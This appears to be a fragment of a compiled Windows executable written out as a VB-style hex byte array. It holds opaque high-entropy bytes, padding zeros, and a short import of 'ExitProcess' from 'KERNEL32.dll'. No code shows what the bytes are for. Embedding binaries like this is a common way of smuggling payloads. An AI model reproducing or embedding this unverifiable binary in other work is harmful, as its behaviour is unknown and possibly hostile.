&H80&H19&H3B&H35&H6F&H7B&H3B&H54&H87&HD1&H5F&H41&HDD&H30&H97&H09&H99&HE3&HC2&H9F&HAE&HFD&H57&H23&H31&HC4&HD7&H3B&H26&HE4&H50&HD3&HE8&H2D&HF4&HD0&H16&H3A&H05&H3B&H6F&HCF&H93&H2B&H3B&H9D&HAD&HC2&HAD&HC6&H57&H1F&H8A&H97&HC4&HAD&HFB&HCA&H91&H38&HAE&HA2&H3F&HB6&HF2&HC5&HA9&HA5&HA1&HD1&H83&H1B&HD3&HEA&H19&H17&H92&H49&HC7&H78&HCD&H27&HD4&H56&H2E&HB3&HAC&H16&HEC&H49&H8F&H59&HD9&H01&HC4&H5C&HCC&H68&H38&HAC&HAE&H3D&HE3&H54&HD3&H70&HC7&HCB&H82&HF0&HA1&HAF&H8D&HB1&HDD&HB3&H9F&HD7&H7A&H47&HFC&HC7&H36&H46&HBA&HD6&H24&HBA&H5F&HB9&H7F&H92&HA1&H6E&HE1&HC3&HB8&H1C&HE5&HA4&H23&HEA&H4A&H8E&HE0&HFC&H79&HF1&HA0&H54&H61&HFF&HE1&H4A&HCF&H06&H3B&H36&H0D&H94&H36&H8A&H4D&H39&HEA&H12&HDC&HBA&H75&HB8&H6F&HE1&H6A&HF5&H77&H65&H11&H4A&H8C&HA6&HE7&H11&H87&H03&H38&HE5&HFF&H3E&H7C&H15&H2D&HFD&H19&H87&H91&H15&HCB&H03&H22&H50&HE3&HFF&HCF&HB3&H69&HEC&HE3&H40&HAE&H57&H90&HDF&H7E&H87&H97&H63&H47&H57&HC2&HAE&H88&HA4&H01&H65&H79&HD6&HAF&H4B&H9E&HA4&H65&H08&H06&H5E&H46&H97&H91&H6D&H8D&H07&HFA&H88&HF2&HF1&H78&HEE&H69&H5C&HED&H4F&H5F&HB3&H90&H2B&HFE&H14&HE5&H92&HF1&HE8&HB8&HAA&HB8&H88&HA1&H46&H5A&HCE&HAC&H7C&H7C&HC6&H30&H74&H58&H88&H9C&HD9&HB7&H0D&H1E&H77&H92&HAE&HB4&H89&HEE&H2F&HEC&H3E&HE0&H6A&HDB&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H64&HC3&HB9&H84&HDA&H22&HCD&HBF&HE4&HBE&H2B&H32&H14&H8F&HA0&HD4&HA3&H3D&HC3&HC6&HB0&H60&H76&HAC&HF0&H2E&H67&HBA&H25&HD8&H54&HEA&H7D&H75&H8F&H82&H2D&H43&HE4&H5E&HC2&H52&H1F&H3E&H84&HDB&H5B&H22&H38&H0C&HAE&HE9&HC7&HB7




